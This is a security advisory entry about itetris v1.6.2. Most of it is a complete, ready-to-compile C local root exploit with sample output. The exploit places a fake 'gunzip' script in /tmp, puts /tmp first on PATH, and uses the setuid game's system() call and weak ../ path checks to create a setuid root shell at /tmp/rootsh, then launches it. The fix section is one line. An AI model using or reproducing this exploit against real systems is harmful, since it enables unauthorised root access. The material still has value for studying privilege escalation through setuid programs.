COMMAND
itetris
SYSTEMS AFFECTED
itetris v1.6.2
PROBLEM
Chris Sharp found following. He was auditing some svgalib (suid
root) programs and noticed itetris had a possibly exploitable
system(); call... which has since obviously proven exploitable.
ORIGINAL exploit url below:
http://realhalo.org/xitetris.c
Here is the code:
/* (*)itetris[v1.6.2] local root exploit, by: v9[v9@fakehalo.org].
this will give you root on systems that have the itetris game
installed. the program is installed setuid(0)/root due to svgalib.
this exploits a system() call mixed with bad ../ protection, which
makes this possible -- considering it needs a font file to end with
".gz" to run gunzip.
---------------------------------------------------------------------------
# cc xitetris.c -o xitetris
# ./xitetris
[ (*)itetris[v1.6.2] local root exploit, by: v9[v9@fakehalo.org]. ]
[*] checking /usr/local/bin/itetris for proper file permissions.
[*] done, /usr/local/bin/itetris appears to be setuid.
[*] done, making temporary files.
[*] done, setting up environment variable(s).
[*] done, launching /usr/local/bin/itetris. (the screen may blink locally)
[*] done, cleaning up temporary files.
[*] done, checking /tmp/rootsh for proper file permissions.
[*] success! /tmp/rootsh appears to be set*id.
[?] do you wish to enter the rootshell now(y/n)?: y
[*] ok, executing rootshell(/tmp/rootsh) now.
#
---------------------------------------------------------------------------
*/
#define PATH
"/usr/local/bin/itetris" // path to itetris.
#define APPENDPATH
"/tmp" // tmp dir to use.
#define EXECFILE
"gunzip" // don't change this.
#define FAKEFILE
"xitetris.gz" // must end with .gz.
#define SUIDSHELL
"/tmp/rootsh" // root shell
location.
#include <stdio.h>
#include <sys/stat.h>
main(){
char cmd[256],tmpfile[256],fakefile[256],path[1024],input[0];
struct stat mod1,mod2;
FILE *suidexec,*fakegz;
fprintf(stderr,"[ (*)itetris[v1.6.2] local root exploit, by: v9[v9@fakehalo.org]. ]\n");
fprintf(stderr,"[*] checking %s for proper file permissions.\n",PATH);
if(stat(PATH,&mod1)){
fprintf(stderr,"[!] failed, %s doesnt appear to exist.\n",PATH);
exit(1);
}
else if(mod1.st_mode==35309){
fprintf(stderr,"[*] done, %s appears to be setuid.\n",PATH);
}
else{
fprintf(stderr,"[!] failed, %s doesn't appear to be setuid.\n",PATH);
exit(1);
}
fprintf(stderr,"[*] done, making temporary files.\n");
snprintf(fakefile,sizeof(fakefile),"%s/%s",APPENDPATH,FAKEFILE);
snprintf(tmpfile,sizeof(tmpfile),"%s/%s",APPENDPATH,EXECFILE);
unlink(fakefile);fakegz=fopen(fakefile,"w");fclose(fakegz);
unlink(tmpfile);suidexec=fopen(tmpfile,"w");
fprintf(suidexec,"#!/bin/sh\n");
fprintf(suidexec,"cp /bin/sh %s\n",SUIDSHELL);
fprintf(suidexec,"chown 0.0 %s\n",SUIDSHELL);
fprintf(suidexec,"chmod 6755 %s\n",SUIDSHELL);
fclose(suidexec);
chmod(tmpfile,33261);
fprintf(stderr,"[*] done, setting up environment variable(s).\n");
snprintf(path,sizeof(path),"%s:%s",APPENDPATH,getenv("PATH"));
setenv("PATH",path,1);
fprintf(stderr,"[*] done, launching %s. (the screen may blink locally)\n",
PATH);
sleep(1);
snprintf(cmd,sizeof(cmd),"%s -VE -F../../../../%s/%s 1>/dev/null 2>&1",PATH,
APPENDPATH,FAKEFILE);
system(cmd);
fprintf(stderr,"[*] done, cleaning up temporary files.\n");
unlink(fakefile);unlink(tmpfile);
fprintf(stderr,"[*] done, checking %s for proper file permissions.\n",
SUIDSHELL);
if(stat(SUIDSHELL,&mod2)){
fprintf(stderr,"[!] failed, %s doesnt appear to exist.\n",SUIDSHELL);
exit(1);
}
else if(mod2.st_mode==36333){
fprintf(stderr,"[*] success! %s appears to be set*id.\n",SUIDSHELL);
}
else{
fprintf(stderr,"[!] failed, %s doesn't appear to be set*id.\n",SUIDSHELL);
exit(1);
}
fprintf(stderr,"[?] do you wish to enter the rootshell now(y/n)?: ");
scanf("%s",input);
if(input[0]!=0x59&&input[0]!=0x79){
printf("[*] aborted, the rootshell is: %s.\n",SUIDSHELL);
}
else{
printf("[*] ok, executing rootshell(%s) now.\n",SUIDSHELL);
execl(SUIDSHELL,SUIDSHELL,0);
}
fprintf(stderr,"[*] exiting program successfully.\n");
exit(0);
}
SOLUTION
Should be fixed in new release.